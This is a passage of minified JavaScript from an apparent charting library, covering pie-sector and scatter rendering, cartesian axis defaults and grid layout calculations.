c=o.getShallow("animationType");o.ecModel.ssr?(zh(r,{scaleX:0,scaleY:0},o,{dataIndex:e,isFrom:!0}),r.originX=u.cx,r.originY=u.cy):"scale"===c?(r.shape.r=l.r0,zh(r,{shape:{r:l.r}},o,e)):null!=n?(r.setShape({startAngle:n,endAngle:n}),zh(r,{shape:{startAngle:l.startAngle,endAngle:l.endAngle}},o,e)):(r.shape.endAngle=l.startAngle,Bh(r,{shape:{endAngle:l.endAngle}},o,e))}else Gh(r),Bh(r,{shape:u},o,e);r.useStyle(t.getItemVisual(e,"style")),gc(r,a);var h=(l.startAngle+l.endAngle)/2,p=o.get("selectedOffset"),d=Math.cos(h)*p,f=Math.sin(h)*p,g=a.getShallow("cursor");g&&r.attr("cursor",g),this._updateLabel(o,t,e),r.ensureState("emphasis").shape=A({r:l.r+(s.get("scale")&&s.get("scaleSize")||0)},yC(s.getModel("itemStyle"),l)),A(r.ensureState("select"),{x:d,y:f,shape:yC(a.getModel(["select","itemStyle"]),l)}),A(r.ensureState("blur"),{shape:yC(a.getModel(["blur","itemStyle"]),l)});var v=r.getTextGuideLine(),y=r.getTextContent();v&&A(v.ensureState("select"),{x:d,y:f}),A(y.ensureState("select"),{x:d,y:f}),pc(this,s.get("focus"),s.get("blurScope"),s.get("disabled"))}},e.prototype._updateLabel=function(t,e,n){var i=this,r=e.getItemModel(n),o=r.getModel("labelLine"),a=e.getItemVisual(n,"style"),s=a&&a.fill,l=a&&a.opacity;Pp(i,Lp(r),{labelFetcher:e.hostModel,labelDataIndex:n,inheritColor:s,defaultOpacity:l,defaultText:t.getFormattedLabel(n,"normal")||e.getName(n)});var u=i.getTextContent();i.setTextConfig({position:null,rotation:null}),u.attr({z2:10});var c=r.get(["label","position"]);if("outside"!==c&&"outer"!==c)i.removeTextGuideLine();else{var h=this.getTextGuideLine();h||(h=new lh,this.setTextGuideLine(h)),function(t,e,n){var i=t.getTextGuideLine(),r=t.getTextContent();if(r){for(var o=e.normal,a=o.get("show"),s=r.ignore,l=0;l<Au.length;l++){var u=Au[l],c=e[u],h="normal"===u;if(c){var p=c.get("show");if((h?s:at(r.states[u]&&r.states[u].ignore,s))||!at(p,a)){var d=h?i:i&&i.states[u];d&&(d.ignore=!0),i&&RS(i,!0,u,c);continue}i||(i=new lh,t.setTextGuideLine(i),h||!s&&a||RS(i,!0,"normal",e.normal),t.stateProxy&&(i.stateProxy=t.stateProxy)),RS(i,!1,u,c)}}if(i){L(i.style,n),i.style.fill=null;var f=o.get("showAbove");(t.textGuideLineConfig=t.textGuideLineConfig||{}).showAbove=f||!1,i.buildPath=NS}}else i&&t.removeTextGuideLine()}(this,function(t,e){e=e||"labelLine";for(var n={normal:t.getModel(e)},i=0;i<Du.length;i++){var r=Du[i];n[r]=t.getModel([r,e])}return n}(r),{stroke:s,opacity:st(o.get(["lineStyle","opacity"]),l,1)})}},e}(eh),tI=function(t){function e(){var e=null!==t&&t.apply(this,arguments)||this;return e.type=EC,e.ignoreLabelLineUpdate=!0,e}return n(e,t),e.prototype.render=function(t,e,n,i){var r,o=t.getData(),a=this._data,s=this.group;if(!a&&o.count()>0){for(var l=o.getItemLayout(0),u=1;isNaN(l&&l.startAngle)&&u<o.count();++u)l=o.getItemLayout(u);l&&(r=l.startAngle)}if(this._emptyCircleSector&&s.remove(this._emptyCircleSector),0===o.count()&&t.get("showEmptyCircle")){var c=QC(t),h=new eh({shape:C(c)});h.useStyle(t.getModel("emptyCircleStyle").getItemStyle()),this._emptyCircleSector=h,s.add(h)}o.diff(a).add(function(t){var e=new JC(o,t,r);o.setItemGraphicEl(t,e),s.add(e)}).update(function(t,e){var n=a.getItemGraphicEl(e);n.updateData(o,t,r),n.off("click"),s.add(n),o.setItemGraphicEl(t,n)}).remove(function(e){Hh(a.getItemGraphicEl(e),t,e)}).execute(),jC(t),"expansion"!==t.get("animationTypeUpdate")&&(this._data=o)},e.prototype.dispose=function(){},e.prototype.containPoint=function(t,e){var n=e.getData().getItemLayout(0);if(n){var i=t[0]-n.cx,r=t[1]-n.cy,o=Math.sqrt(i*i+r*r);return o<=n.r&&o>=n.r0}},e.type=EC,e}(cy);var eI=function(t){function e(){var n=null!==t&&t.apply(this,arguments)||this;return n.type=e.type,n.hasSymbolVisual=!0,n}return n(e,t),e.prototype.getInitialData=function(t,e){return eb(null,this,{useEncodeDefaulter:!0})},e.prototype.getProgressive=function(){var t=this.option.progressive;return null==t?this.option.large?5e3:this.get("progressive"):t},e.prototype.getProgressiveThreshold=function(){var t=this.option.progressiveThreshold;return null==t?this.option.large?1e4:this.get("progressiveThreshold"):t},e.prototype.brushSelector=function(t,e,n){return n.point(e.getItemLayout(t))},e.prototype.getZLevelKey=function(){return this.getData().count()>this.getProgressiveThreshold()?this.id:""},e.type="series.scatter",e.dependencies=["grid","polar","geo","singleAxis","calendar","matrix"],e.defaultOption={coordinateSystem:"cartesian2d",z:2,legendHoverLink:!0,symbolSize:10,large:!1,largeThreshold:2e3,itemStyle:{opacity:.8},emphasis:{scale:!0},clip:!0,select:{itemStyle:{borderColor:Cf.color.primary}},universalTransition:{divideShape:"clone"}},e}(Qv),nI=function(){},iI=function(t){function e(e){var n=t.call(this,e)||this;return n._off=0,n.hoverDataIdx=-1,n}return n(e,t),e.prototype.getDefaultShape=function(){return new nI},e.prototype.reset=function(){this.notClear=!1,this._off=0},e.prototype.beforeBrush=function(t){t&&!t.contentRetained&&this.reset()},e.prototype.buildPath=function(t,e){var n,i=e.points,r=e.size,o=this.symbolProxy,a=o.shape,s=t.getContext?t.getContext():t,l=s&&r[0]<4,u=this.softClipShape;if(l)this._ctx=s;else{for(this._ctx=null,n=this._off;n<i.length;){var c=i[n++],h=i[n++];isNaN(c)||isNaN(h)||(u&&!u.contain(c,h)||(a.x=c-r[0]/2,a.y=h-r[1]/2,a.width=r[0],a.height=r[1],o.buildPath(t,a,!0)))}this.incremental&&(this._off=n,this.notClear=!0)}},e.prototype.afterBrush=function(){var t,e=this.shape,n=e.points,i=e.size,r=this._ctx,o=this.softClipShape;if(r){for(t=this._off;t<n.length;){var a=n[t++],s=n[t++];isNaN(a)||isNaN(s)||(o&&!o.contain(a,s)||r.fillRect(a-i[0]/2,s-i[1]/2,i[0],i[1]))}this.incremental&&(this._off=t,this.notClear=!0)}},e.prototype.findDataIndex=function(t,e){for(var n=this.shape,i=n.points,r=n.size,o=Math.max(r[0],4),a=Math.max(r[1],4),s=i.length/2-1;s>=0;s--){var l=2*s,u=i[l]-o/2,c=i[l+1]-a/2;if(t>=u&&e>=c&&t<=u+o&&e<=c+a)return s}return-1},e.prototype.contain=function(t,e){var n=this.transformCoordToLocal(t,e),i=this.getBoundingRect();return t=n[0],e=n[1],i.contain(t,e)?(this.hoverDataIdx=this.findDataIndex(t,e))>=0:(this.hoverDataIdx=-1,!1)},e.prototype.getBoundingRect=function(){var t=this._rect;if(!t){for(var e=this.shape,n=e.points,i=e.size,r=i[0],o=i[1],a=1/0,s=1/0,l=-1/0,u=-1/0,c=0;c<n.length;){var h=n[c++],p=n[c++];a=Math.min(h,a),l=Math.max(h,l),s=Math.min(p,s),u=Math.max(p,u)}t=this._rect=new Ue(a-r/2,s-o/2,l-a+r,u-s+o)}return t},e}(Bl),rI=function(){function t(){this.group=new ho}return t.prototype.updateData=function(t,e){this._clear(),this._data=t;var n=this._create();n.setShape({points:t.getLayout("points")}),this._setCommon(n,t,e)},t.prototype.updateLayout=function(t){var e=this._data;if(e){var n=e.getLayout("points");this.group.eachChild(function(t){if(null!=t.startIndex){var e=2*(t.endIndex-t.startIndex),i=4*t.startIndex*2;n=new Float32Array(n.buffer,i,e)}t.setShape("points",n),t.reset(),t.stopAnimation()})}},t.prototype.incrementalPrepareUpdate=function(t){this._clear()},t.prototype.incrementalUpdate=function(t,e,n,i){var r=this._newAdded[0],o=e.getLayout("points"),a=r&&r.shape.points;if(a&&a.length<2e4){var s=a.length,l=new Float32Array(s+o.length);l.set(a),l.set(o,s),r.endIndex=t.end,r.setShape({points:l})}else{this._newAdded=[];var u=this._create();u.startIndex=t.start,u.endIndex=t.end,u.incremental=n,u.setShape({points:o}),this._setCommon(u,e,i)}},t.prototype.eachRendered=function(t){this._newAdded[0]&&t(this._newAdded[0])},t.prototype._create=function(){var t=new iI({cursor:"default"});return t.ignoreCoarsePointer=!0,this.group.add(t),this._newAdded.push(t),t},t.prototype._setCommon=function(t,e,n){var i=e.hostModel;n=n||{};var r=e.getVisual("symbolSize");t.setShape("size",r instanceof Array?r:[r,r]),t.softClipShape=n.clipShape||null,t.symbolProxy=Mm(e.getVisual("symbol"),0,0,0,0),t.setColor=t.symbolProxy.setColor;var o=t.shape.size[0]<4;t.useStyle(i.getModel("itemStyle").getItemStyle(o?["color","shadowBlur","shadowColor"]:["color"]));var a=e.getVisual("style"),s=a&&a.fill;s&&t.setColor(s);var l=hu(t);l.seriesIndex=i.seriesIndex,t.on("mousemove",function(e){l.dataIndex=null;var n=t.hoverDataIdx;n>=0&&(l.dataIndex=n+(t.startIndex||0))})},t.prototype.remove=function(){this._clear()},t.prototype._clear=function(){this._newAdded=[],this.group.removeAll()},t}(),oI=function(t){function e(){var n=null!==t&&t.apply(this,arguments)||this;return n.type=e.type,n}return n(e,t),e.prototype.render=function(t,e,n){var i=t.getData();this._updateSymbolDraw(i,t).updateData(i,aI(t)),this._finished=!0},e.prototype.incrementalPrepareRender=function(t,e,n){var i=t.getData();this._updateSymbolDraw(i,t).incrementalPrepareUpdate(i),this._finished=!1},e.prototype.incrementalRender=function(t,e,n){this._symbolDraw.incrementalUpdate(t,e.getData(),Za(e),aI(e)),this._finished=t.end===e.getData().count()},e.prototype.updateTransform=function(t,e,n){var i=t.getData();if(this.group.dirty(),!this._finished)return{update:!0};var r=lk("").reset(t,e,n);r.progress&&r.progress({start:0,end:i.count(),count:i.count()},i),this._symbolDraw.updateLayout(aI(t))},e.prototype.eachRendered=function(t){this._symbolDraw&&this._symbolDraw.eachRendered(t)},e.prototype._updateSymbolDraw=function(t,e){var n=this._symbolDraw,i=e.pipelineContext.large;return n&&i===this._isLargeDraw||(n&&n.remove(),n=this._symbolDraw=i?new rI:new PT,this._isLargeDraw=i,this.group.removeAll()),this.group.add(n.group),n},e.prototype.remove=function(t,e){this._symbolDraw&&this._symbolDraw.remove(!0),this._symbolDraw=null},e.prototype.dispose=function(){},e.type="scatter",e}(cy);function aI(t){return{clipShape:jT(t)}}var sI=function(t){function e(){return null!==t&&t.apply(this,arguments)||this}return n(e,t),e.prototype.getCoordSysModel=function(){return this.getReferringComponents("grid",Da).models[0]},e.type="cartesian2dAxis",e}(kf);B(sI,aw);var lI={show:!0,z:0,inverse:!1,name:"",nameLocation:"end",nameRotate:null,nameTruncate:{maxWidth:null,ellipsis:"...",placeholder:"."},nameTextStyle:{},nameGap:15,silent:!1,triggerEvent:!1,tooltip:{show:!1},axisPointer:{},axisLine:{show:!0,onZero:"auto",onZeroAxisIndex:null,lineStyle:{color:Cf.color.axisLine,width:1,type:"solid"},symbol:["none","none"],symbolSize:[10,15],breakLine:!0},axisTick:{show:!0,inside:!1,length:5,lineStyle:{width:1}},axisLabel:{show:!0,inside:!1,rotate:0,showMinLabel:null,showMaxLabel:null,margin:8,fontSize:12,color:Cf.color.axisLabel,textMargin:[0,3]},splitLine:{show:!0,showMinLine:!0,showMaxLine:!0,lineStyle:{color:Cf.color.axisSplitLine,width:1,type:"solid"}},splitArea:{show:!1,areaStyle:{color:[Cf.color.backgroundTint,Cf.color.backgroundTransparent]}},breakArea:{show:!0,itemStyle:{color:Cf.color.neutral00,borderColor:Cf.color.border,borderWidth:1,borderType:[3,3],opacity:.6},zigzagAmplitude:4,zigzagMinSpan:4,zigzagMaxSpan:20,zigzagZ:100,expandOnClick:!0},breakLabelLayout:{moveOverlap:"auto"}},uI=I({boundaryGap:!0,deduplication:null,jitter:0,jitterOverlap:!0,jitterMargin:2,splitLine:{show:!1},axisTick:{alignWithLabel:!1,interval:"auto",show:"auto"},axisLabel:{interval:"auto"}},lI),cI=I({boundaryGap:[0,0],axisLine:{show:"auto"},axisTick:{show:"auto"},splitNumber:5,minorTick:{show:!1,splitNumber:5,length:3,lineStyle:{}},minorSplitLine:{show:!1,lineStyle:{color:Cf.color.axisMinorSplitLine,width:1}}},lI),hI={category:uI,value:cI,time:I({splitNumber:6,axisLabel:{rich:{primary:{fontWeight:"bold"}}},splitLine:{show:!1}},cI),log:L({logBase:10},cI)};function pI(t,e,i,r){E(Ub,function(o,a){var s=I(I({},hI[a],!0),r,!0),l=function(t){function i(){var n=null!==t&&t.apply(this,arguments)||this;return n.type=e+"Axis."+a,n}return n(i,t),i.prototype.mergeDefaultAndTheme=function(t,e){var n=bf(this),i=n?Sf(t):{};I(t,e.getTheme().get(a+"Axis")),I(t,this.getDefaultOption()),t.type=dI(t),n&&wf(t,i,n)},i.prototype.optionUpdated=function(){"category"===this.option.type&&(this.__ordinalMeta=rb.createByAxisModel(this))},i.prototype.getCategories=function(t){var e=this.option;if("category"===e.type)return t?e.data:this.__ordinalMeta.categories},i.prototype.getOrdinalMeta=function(){return this.__ordinalMeta},i.prototype.updateAxisBreaks=function(t){var e=fk();return e?e.updateModelAxisBreak(this,t):{breaks:[]}},i.type=e+"Axis."+a,i.defaultOption=s,i}(i);t.registerComponentModel(l)}),t.registerSubTypeDefaulter(e+"Axis",dI)}function dI(t){return t.type||(t.data?"category":"value")}var fI=function(){function t(t){this.type="cartesian",this._dimList=[],this._axes={},this.name=t||""}return t.prototype.getAxis=function(t){return this._axes[t]},t.prototype.getAxes=function(){return V(this._dimList,function(t){return this._axes[t]},this)},t.prototype.getAxesByScale=function(t){return t=t.toLowerCase(),H(this.getAxes(),function(e){return e.scale.type===t})},t.prototype.addAxis=function(t){var e=t.dim;this._axes[e]=t,this._dimList.push(e)},t}(),gI=["x","y"];function vI(t){return("interval"===t.type||"time"===t.type)&&!gd(t)}var yI=function(t){function e(){var e=null!==t&&t.apply(this,arguments)||this;return e.type=nC,e.dimensions=gI,e}return n(e,t),e.prototype.calcAffineTransform=function(){this._transform=this._invTransform=null;var t=this.getAxis("x").scale,e=this.getAxis("y").scale;if(vI(t)&&vI(e)){var n=hb(t,null),i=hb(e,null),r=this.dataToPoint([n[0],i[0]]),o=this.dataToPoint([n[1],i[1]]),a=n[1]-n[0],s=i[1]-i[0];if(a&&s){var l=(o[0]-r[0])/a,u=(o[1]-r[1])/s,c=r[0]-n[0]*l,h=r[1]-i[0]*u,p=this._transform=[l,0,0,u,c,h];this._invTransform=Ie([],p)}}},e.prototype.getBaseAxis=function(){return this.getAxesByScale("ordinal")[0]||this.getAxesByScale("time")[0]||this.getAxis("x")},e.prototype.containPoint=function(t){var e=this.getAxis("x"),n=this.getAxis("y");return e.contain(e.toLocalCoord(t[0]))&&n.contain(n.toLocalCoord(t[1]))},e.prototype.containData=function(t){return this.getAxis("x").containData(t[0])&&this.getAxis("y").containData(t[1])},e.prototype.containZone=function(t,e){var n=this.dataToPoint(t),i=this.dataToPoint(e),r=this.getArea(),o=new Ue(n[0],n[1],i[0]-n[0],i[1]-n[1]);return r.intersect(o)},e.prototype.dataToPoint=function(t,e,n){n=n||[];var i=t[0],r=t[1];if(this._transform&&null!=i&&isFinite(i)&&null!=r&&isFinite(r))return Ut(n,t,this._transform);var o=this.getAxis("x"),a=this.getAxis("y");return n[0]=o.toGlobalCoord(o.dataToCoord(i,e)),n[1]=a.toGlobalCoord(a.dataToCoord(r,e)),n},e.prototype.clampData=function(t,e){var n=this.getAxis("x").scale,i=this.getAxis("y").scale,r=n.getExtent(),o=i.getExtent(),a=n.parse(t[0]),s=i.parse(t[1]);return(e=e||[])[0]=Math.min(Math.max(Math.min(r[0],r[1]),a),Math.max(r[0],r[1])),e[1]=Math.min(Math.max(Math.min(o[0],o[1]),s),Math.max(o[0],o[1])),e},e.prototype.pointToData=function(t,e,n){if(n=n||[],this._invTransform)return Ut(n,t,this._invTransform);var i=this.getAxis("x"),r=this.getAxis("y");return n[0]=i.coordToData(i.toLocalCoord(t[0]),e),n[1]=r.coordToData(r.toLocalCoord(t[1]),e),n},e.prototype.getOtherAxis=function(t){return this.getAxis("x"===t.dim?"y":"x")},e.prototype.getArea=function(t){t=t||0;var e=this.getAxis("x").getGlobalExtent(),n=this.getAxis("y").getGlobalExtent(),i=Math.min(e[0],e[1])-t,r=Math.min(n[0],n[1])-t,o=Math.max(e[0],e[1])-i+t,a=Math.max(n[0],n[1])-r+t;return new Ue(i,r,o,a)},e}(fI);var mI=[[3,1],[0,2]],_I=function(){function t(t,e,n){this.type="grid",this._coordsMap={},this._coordsList=[],this._axesMap={},this._axesList=[],this.axisPointerEnabled=!0,this.dimensions=gI,this._initCartesian(t,e,n),this.model=t}return t.prototype.getRect=function(){return this._rect},t.prototype.update=function(t,e){var n=this._axesMap;function i(t){for(var e=W(t),n=[],i=e.length-1;i>=0;i--){var r=t[+e[i]];r.__alignTo?n.push(r):Nw(r)}E(n,function(t){var e,n;e=t,n=t.__alignTo,gd(e.scale)||gd(n.scale)||n.scale.getTicks().length<2?Nw(t):function(t,e){var n,i,r,o=t.scale,a=t.model,s=Lw(o,a,a.ecModel,t,null),l=_b(o),u=_b(e)?e.intervalStub:e,c=l?o.intervalStub:o,h=o.base,p=u.getTicks(),d=u.getTicks({expandToNicedExtent:!0}),f=p.length-1;if(1===f)n=i=0,r=1;else if(2===f){var g=To(p[0].value-p[1].value),v=To(p[1].value-p[2].value);n=i=0,g===v?r=2:(r=1,g<v?n=g/v:i=v/g)}else{var y=u.getConfig().interval;n=(1-(p[0].value-d[0].value)/y)%1,i=(1-(d[f].value-p[f].value)/y)%1,r=f-(n?1:0)-(i?1:0)}var m,_,x,b,w,S,M=s.zoomFixMM,T=M[0]||M[1],k=[s.fixMM[0]||T,s.fixMM[1]||T],C=o.getExtent(),I=c.getExtent(),D=Tb(I,k);function A(t){for(var e=0;e<50&&!t();e++)x=l?x*Mo(h,2):bb(x),b=wb(x)}function P(){m=zo(S-x*n,b)}function L(){_=zo(w+x*i,b)}function O(){S=n?zo(m+x*n,b):m}function R(){w=i?zo(_-x*i,b):_}if(k[0]&&k[1]){m=D[0],_=D[1],x=(_-m)/(r+n+i);var N=t.getExtent(),B=To(N[1]-N[0]);b=Ho([_,m],B,.5/r),O(),R(),ia(b)&&(x=zo(x,b))}else{var z=D[1]-D[0];x=l?Mo(qo(z),1):$o(z/r,2),b=wb(x),k[0]?(m=D[0],A(function(){if(O(),w=zo(S+x*r,b),L(),_>=D[1])return!0})):k[1]?(_=D[1],A(function(){if(R(),S=zo(w-x*r,b),P(),m<=D[0])return!0})):A(function(){S=zo(Io(D[0]/x)*x,b),w=zo(Co(D[1]/x)*x,b);var t=ko((w-S)/x);if(t<=r){var e=r-t,n=void 0,i=s.incl0||l;if(i&&0===D[0])n=[0,e];else if(i&&0===D[1])n=[e,0];else{var o=Co(e/2);n=e%2==0?[o,o]:m+_<D[0]+D[1]?[o,o+1]:[o+1,o]}if(S=zo(S-x*n[0],b),w=zo(w+x*n[1],b),P(),L(),m<=D[0]&&_>=D[1])return!0}})}iw(o,k,I,[m,_],C,{interval:x,intervalCount:r,intervalPrecision:b,niceExtent:[S,w]})}(t,t.__alignTo.scale)})}E(this._axesList,function(t){Dw(t,1);var e=t.scale;xb(e)&&e.setSortInfo(t.model.get("categorySortInfo"))}),i(n.x),i(n.y);var r={};E(n.x,function(t){xI(n,"y",t,r)}),E(n.y,function(t){xI(n,"x",t,r)}),this.resize(this.model,e)},t.prototype.resize=function(t,e,n){var i=_f(t,e),r=this._rect=yf(t.getBoxLayoutParams(),i.refContainer),o=this._axesMap,a=this._coordsList,s=t.get("containLabel");if(SI(o,r),!n){var l=function(t,e,n,i,r){var o=new Ik(CI);return E(n,function(n){return E(n,function(n){if(ew(n.model)){var a=!i;n.axisBuilder=function(t,e,n,i,r,o){for(var a=Yk(t,n),s=!1,l=!1,u=0;u<e.length;u++)vb(e[u].getOtherAxis(n.axis).scale)&&(s=l=!0,"category"===n.axis.type&&n.axis.onBand&&(l=!1));return a.axisLineAutoShow=s,a.axisTickAutoShow=l,a.defaultNameMoveOverlap=o,new Rk(n,i,a,r)}(t,e,n.model,r,o,a)}})}),o}(r,a,o,s,e),u=void 0;if(s)u=TI(r.clone(),"axisLabel",null,r,o,l,i);else{var c=function(t,e,n){var i,r=t.get("outerBoundsMode",!0);"same"===r?i=e.clone():null!=r&&"auto"!==r||(i=yf(t.get("outerBounds",!0)||tC,n.refContainer));var o,a=t.get("outerBoundsContain",!0);o=null==a||"auto"===a||R(["all","axisLabel"],a)<0?"all":a;var s=[Bo(at(t.get("outerBoundsClampWidth",!0),eC[0]),e.width),Bo(at(t.get("outerBoundsClampHeight",!0),eC[1]),e.height)];return{outerBoundsRect:i,parsedOuterBoundsContain:o,outerBoundsClamp:s}}(t,r,i),h=c.outerBoundsRect,p=c.parsedOuterBoundsContain,d=c.outerBoundsClamp;h&&(u=TI(h,p,d,r,o,l,i))}kI(r,o,aS,null,u,i),E(this._coordsList,function(t){t.calcAffineTransform()})}},t.prototype.getAxis=function(t,e){var n=this._axesMap[t];if(null!=n)return n[e||0]},t.prototype.getAxes=function(){return this._axesList.slice()},t.prototype.getCartesian=function(t,e){if(null!=t&&null!=e){var n="x"+t+"y"+e;return this._coordsMap[n]}$(t)&&(e=t.yAxisIndex,t=t.xAxisIndex);for(var i=0,r=this._coordsList;i<r.length;i++)if(r[i].getAxis("x").index===t||r[i].getAxis("y").index===e)return r[i]},t.prototype.getCartesians=function(){return this._coordsList.slice()},t.prototype.convertToPixel=function(t,e,n){var i=this._findConvertTarget(e);return i.cartesian?i.cartesian.dataToPoint(n):i.axis?i.axis.toGlobalCoord(i.axis.dataToCoord(n)):null},t.prototype.convertFromPixel=function(t,e,n){var i=this._findConvertTarget(e);return i.cartesian?i.cartesian.pointToData(n):i.axis?i.axis.coordToData(i.axis.toLocalCoord(n)):null},t.prototype._findConvertTarget=function(t){var e,n,i=t.seriesModel,r=t.xAxisModel||i&&i.getReferringComponents("xAxis",Da).models[0],o=t.yAxisModel||i&&i.getReferringComponents("yAxis",Da).models[0],a=t.gridModel,s=this._coordsList;if(i)R(s,e=i.coordinateSystem)<0&&(e=null);else if(r&&o)e=this.getCartesian(r.componentIndex,o.componentIndex);else if(r)n=this.getAxis("x",r.componentIndex);else if(o)n=this.getAxis("y",o.componentIndex);else if(a){a.coordinateSystem===this&&(e=this._coordsList[0])}return{cartesian:e,axis:n}},t.prototype.containPoint=function(t){var e=this._coordsList[0];if(e)return e.containPoint(t)},t.prototype._initCartesian=function(t,e,n){var i=this,r=this,o={left:!1,right:!1,top:!1,bottom:!1},a={x:{},y:{}},s={x:0,y:0};if(e.eachComponent("xAxis",l("x"),this),e.eachComponent("yAxis",l("y"),this),!s.x||!s.y)return this._axesMap={},void(this._axesList=[]);function l(e){return function(n,i){if(function(t,e){return t.getCoordSysModel()===e}(n,t)){var l=n.get("position");"x"===e?"top"!==l&&"bottom"!==l&&(l=o.bottom?"top":"bottom"):"left"!==l&&"right"!==l&&(l=o.left?"right":"left"),o[l]=!0;var u=Yb(n),c=new pk(e,Xb(n,u,!0),[0,0],u,l);c.onBand=ow(c.scale,n),c.inverse=n.get("inverse"),n.axis=c,c.model=n,c.grid=r,c.index=i,r._axesList.push(c),a[e][i]=c,s[e]++}}}this._axesMap=a,E(a.x,function(e,n){E(a.y,function(r,o){var a="x"+n+"y"+o,s=new yI(a);s.master=i,s.model=t,i._coordsMap[a]=s,i._coordsList.push(s),s.addAxis(e),s.addAxis(r)})}),wI(a.x),wI(a.y)},t.prototype.getTooltipAxes=function(t){var e=[],n=[];return E(this.getCartesians(),function(i){var r=null!=t&&"auto"!==t?i.getAxis(t):i.getBaseAxis(),o=i.getOtherAxis(r);R(e,r)<0&&e.push(r),R(n,o)<0&&n.push(o)}),{baseAxes:e,otherAxes:n}},t.create=function(e,n){var i=[];return e.eachComponent("grid",function(r,o){var a=new t(r,e,n);a.name="grid_"+o,a.resize(r,n,!0),r.coordinateSystem=a,i.push(a),E(a._axesList,function(e){var n,i;n=e,i=t.dimIdxMap,Iw(n).dimIdxInCoord=i.get(n.dim)})}),e.eachSeries(function(t){var e,n;!function(t){var e=t.targetModel,n=t.coordSysType,i=t.coordSysProvider,r=t.isDefaultDataCoordSys;t.allowNotFound;var o=cf(e),a=o.kind,s=o.coordSysType;if(r&&1!==a&&(a=1,s=n),0===a||s!==n)return 0;var l=i(n,e);l&&(1===a?e.coordinateSystem=l:e.boxCoordinateSystem=l)}({targetModel:t,coordSysType:nC,coordSysProvider:function(){var i=function(t){var e={xAxisModel:null,yAxisModel:null};return E(e,function(n,i){var r=i.replace(/Model$/,""),o=t.getReferringComponents(r,Da).models[0];e[i]=o}),e}(t),r=i.xAxisModel,o=i.yAxisModel;e=r.axis,n=o.axis;var a=r.getCoordSysModel();0;return a.coordinateSystem.getCartesian(r.componentIndex,o.componentIndex)}}),e&&n&&(xw(e,t,nC),xw(n,t,nC))},this),i},t.dimensions=gI,t.dimIdxMap=Px(gI),t}();function xI(t,e,n,i){n.getAxesOnZeroOf=function(){return r?[r]:[]};var r,o=t[e],a=n.model,s=a.get(["axisLine","onZero"]),l=a.get(["axisLine","onZeroAxisIndex"]);if(s){if(null!=l)bI(s,o[l])&&(r=o[l]);else for(var u in o)if(wt(o,u)&&bI(s,o[u])&&!i[c(o[u])]){r=o[u];break}r&&(i[c(r)]=!0)}function c(t){return t.dim+"_"+t.index}}function bI(t,e){if(!e)return!1;var n=function(t,e,n){var i=n?hb(t,null):t.getExtentUnsafe(0,null),r=i[0],o=i[1];return Ea(r,o)?r===e||o===e?qb:r<e&&o>e?jb:Kb:Kb}(e.scale,0,!1),i=e&&"category"!==e.type&&"time"!==e.type&&n!==Kb;return i&&"auto"===t&&function(t){return Zb(t).noOnMyZero}(e)&&(i=!1),i}function wI(t){for(var e,n=W(t),i=[],r=n.length-1;r>=0;r--){var o=t[+n[r]];vb(o.scale)&&null==nw(o.model,o.type,!0)&&(o.model.get("alignTicks")&&null==o.model.get("interval")?i.push(o):e=o)}e||(e=i.pop()),e&&E(i,function(t){t.__alignTo=e})}function SI(t,e){E(t.x,function(t){return MI(t,e.x,e.width)}),E(t.y,function(t){return MI(t,e.y,e.height)})}function MI(t,e,n){var i=[0,n],r=t.inverse?1:0;t.setExtent(i[r],i[1-r]),function(t,e){var n=t.getExtent(),i=n[0]+n[1];t.toGlobalCoord="x"===t.dim?function(t){return t+e}:function(t){return i-t+e},t.toLocalCoord="x"===t.dim?function(t){return t-e}:function(t){return i-t+e}}(t,e)}function TI(t,e,n,i,r,o,a){kI(i,r,oS,e,!1,a);var s=[0,0,0,0];u(0),u(1),c(i,0,NaN),c(i,1,NaN);var l=null==G(s,function(t){return t>0});return fp(i,s,!0,!0,n),SI(r,i),l;function u(t){E(r[Uh[t]],function(e){if(ew(e.model)){var n=o.ensureRecord(e.model),i=n.labelInfoList;if(i)for(var r=0;r<i.length;r++){var a=i[r],s=e.scale.normalize(rw(e.scale,kk(a.label).labelInfo.tick));s=1===t?1-s:s,c(a.rect,t,s),c(a.rect,1-t,NaN)}var l=n.nameLayout;if(l){s=tw(n.nameLocation)?.5:NaN;c(l.rect,t,s),c(l.rect,1-t,NaN)}}})}function c(e,n,i){var r=t[Uh[n]]-e[Uh[n]],o=e[Zh[n]]+e[Uh[n]]-(t[Zh[n]]+t[Uh[n]]);r=h(r,1-i),o=h(o,i);var a=mI[n][0],l=mI[n][1];s[a]=Mo(s[a],r),s[l]=Mo(s[l],o)}function h(t,e){return t>0&&!rt(e)&&e>1e-4&&(t/=e),t}}function kI(t,e,n,i,r,o){var a=n===aS;E(e,function(e){return E(e,function(e){ew(e.model)&&(!function(t,e,n){var i=Yk(e,n);t.updateCfg(i)}(e.axisBuilder,t,e.model),e.axisBuilder.build(a?{axisTickLabelDetermine:!0}:{axisTickLabelEstimate:!0},{noPxChange:r}))})});var s={x:0,y:0};function l(e){s[Uh[1-e]]=t[Zh[e]]<=.5*o.refContainer[Zh[e]]?0:1-e==1?2:1}l(0),l(1),E(e,function(t,e){return E(t,function(t){ew(t.model)&&(("all"===i||a)&&t.axisBuilder.build({axisName:!0},{nameMarginLevel:s[e]}),a&&t.axisBuilder.build({axisLine:!0}))})})}var CI=function(t,e,n,i,r,o){var a="x"===n.axis.dim?"y":"x";Pk(t,0,0,i,r,o),tw(t.nameLocation)||E(e.recordMap[a],function(t){t&&t.labelInfoList&&t.dirVec&&Ok(t.labelInfoList,t.dirVec,i,r)})};function II(t,e){var n={axesInfo:{},seriesInvolved:!1,coordSysAxesInfo:{},coordSysMap:{}};return function(t,e,n){var i=e.getComponent("tooltip"),r=e.getComponent("axisPointer"),o=r.get("link",!0)||[],a=[];E(n.getCoordinateSystems(),function(n){if(n.axisPointerEnabled){var s=LI(n.model),l=t.coordSysAxesInfo[s]={};t.coordSysMap[s]=n;var u=n.model.getModel("tooltip",i);if(E(n.getAxes(),Z(d,!1,null)),n.getTooltipAxes&&i&&u.get("show")){var c="axis"===u.get("trigger"),h="cross"===u.get(["axisPointer","type"]),p=n.getTooltipAxes(u.get(["axisPointer","axis"]));(c||h)&&E(p.baseAxes,Z(d,!h||"cross",c)),h&&E(p.otherAxes,Z(d,"cross",!1))}}function d(i,s,c){var h=c.model.getModel("axisPointer",r),p=h.get("show");if(p&&("auto"!==p||i||PI(h))){null==s&&(s=h.get("triggerTooltip")),h=i?function(t,e,n,i,r,o){var 